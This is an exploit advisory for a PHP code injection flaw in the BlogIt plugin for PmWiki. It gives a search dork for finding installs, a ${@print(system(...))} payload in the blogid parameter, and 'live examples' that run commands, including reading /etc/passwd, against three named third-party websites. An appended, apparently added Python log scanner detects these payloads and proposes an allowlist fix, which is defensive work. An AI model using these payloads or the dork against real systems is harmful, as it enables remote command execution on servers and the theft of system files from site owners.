===================================================================
BlogIt <= 1.6.0 PHP Code Injection Vulnerability
===================================================================

#[+] Discovered By : Ux0r
#[+] E-mail        : ux0r@live.com
#[+] Home          : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message       : Greetings to the lamers trying to overwrite my old indexes. You made me laugh :)

Product : BlogIt
Version : <= 1.6.0
Site    : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork    : "powered by blogIt"

= Error in file Site.BlogList =

Error code: (Line 11)

text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)

Vulnerable parameter: $bi_BlogId

= Exploit =

- http://site.com/path/Site/BlogList?blogid=${@print(...)} ; ... => PHP code injection

= Example =

- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}

= Live examples =

- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}

< I wish you well. 2011 >
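
= Added example: log detection =

Added example, not part of the original advisory and not BlogIt or PmWiki code: a web-server log check for the request pattern shown above, flagging blogid values that carry PHP ${ or {$ interpolation markers even when percent-encoded more than once. The log lines are constructed, and the allowlist for what a normal blog id looks like is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate blog ids look like "blog1" (letters, digits, _ and -).
SAFE_BLOGID = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
# PHP variable-interpolation markers, as used by the advisory's ${@print(...)} form.
PHP_INTERP = re.compile(r"\$\{|\{\$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """
192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /Site/BlogList?blogid=blog1 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2011:10:00:05 +0000] "GET /Site/BlogList?blogid=${@print(system('pwd'))} HTTP/1.1" 200 5200
203.0.113.7 - - [01/Jan/2011:10:00:09 +0000] "GET /Site/BlogList?blogid=%2524%257B@print(1)%257D HTTP/1.1" 200 5200
192.0.2.44 - - [01/Jan/2011:10:01:00 +0000] "GET /Site/BlogList?action=print&blogid=blog%201 HTTP/1.1" 200 5100
192.0.2.10 - - [01/Jan/2011:10:02:00 +0000] "GET /Main/HomePage HTTP/1.1" 200 4096
""".strip().splitlines()

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches %2524%257B)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_blogid(raw):
    """Return 'injection', 'suspicious' (fails the allowlist) or 'ok'."""
    value = decode_fully(raw)
    if PHP_INTERP.search(value):
        return "injection"
    return "ok" if SAFE_BLOGID.match(value) else "suspicious"

def scan(lines):
    """Return (line_no, verdict, decoded_value) for every non-benign blogid."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            if key == "blogid" and classify_blogid(raw) != "ok":
                findings.append((line_no, classify_blogid(raw), decode_fully(raw)))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The same allowlist, applied to blogid before the page markup is evaluated, rejects every payload form listed in this advisory.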